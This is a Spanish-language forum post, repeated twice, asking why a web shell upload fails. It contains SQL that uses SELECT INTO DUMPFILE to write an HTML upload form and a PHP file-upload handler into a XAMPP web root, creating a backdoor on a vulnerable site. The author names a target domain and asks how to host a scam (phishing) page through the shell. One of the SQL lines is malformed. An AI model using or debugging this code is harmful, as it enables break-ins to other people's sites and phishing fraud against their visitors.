hola a todos los presentes del foro tengo estos problemas, intento subir una shells a una web vulnerable xampp sigo todo los pasos adecuados.
estos son los codigos que utilizo.
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
___________________________________-
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
__________________________
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>mrware.net </title>
</head>
<body bgcolor="white">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">>> MrWare Upload !!! </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />
<input type="submit" value="Subir" />
</form>
</div>
</body>
</html>');
________________________________
select * into dumpfile 'C:/xampp/htdocs/form.php' from
'C:/xampp/htdocs====> en esta parte se que tengo que poner el ROOt de la xampp para que pueda funcionar, igual que en las otras partes
_________________________________________________
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div
align=center><font size=5 color=#ff0000>MrWare subido con ?xito !!</font></body>'; } else { print '<body
bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000> MrWare Fallo al subir !!</font></body>'; } ?> "
)
_____________________________________
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
al subir todo estos en SQL, relativamente cuando voy a la web y pongo form.php me sale para subir la shells la subo y me dice que ha sido subida exitosamente, cuando voy a poner la web vulnerable por ejemplo htps:catama.com/shells.php me da un error que puede ser que esta mal,,,, la shells o es algo en el codigo que tengo mal.
.........................................
despues de esto quisiera aprender a subir en la shells un scam html y archivo php, por que subo un scam pero no me sale igual como lo he realizado, digamos que no me sale con la imagenes cual es el error que estoy comentiendo, muchas gracias por su colaboracion
estos son los codigos que utilizo.
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
___________________________________-
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
__________________________
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>mrware.net </title>
</head>
<body bgcolor="white">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">>> MrWare Upload !!! </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />
<input type="submit" value="Subir" />
</form>
</div>
</body>
</html>');
________________________________
select * into dumpfile 'C:/xampp/htdocs/form.php' from
'C:/xampp/htdocs====> en esta parte se que tengo que poner el ROOt de la xampp para que pueda funcionar, igual que en las otras partes
_________________________________________________
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div
align=center><font size=5 color=#ff0000>MrWare subido con ?xito !!</font></body>'; } else { print '<body
bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000> MrWare Fallo al subir !!</font></body>'; } ?> "
)
_____________________________________
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
al subir todo estos en SQL, relativamente cuando voy a la web y pongo form.php me sale para subir la shells la subo y me dice que ha sido subida exitosamente, cuando voy a poner la web vulnerable por ejemplo htps:catama.com/shells.php me da un error que puede ser que esta mal,,,, la shells o es algo en el codigo que tengo mal.
.........................................
despues de esto quisiera aprender a subir en la shells un scam html y archivo php, por que subo un scam pero no me sale igual como lo he realizado, digamos que no me sale con la imagenes cual es el error que estoy comentiendo, muchas gracias por su colaboracion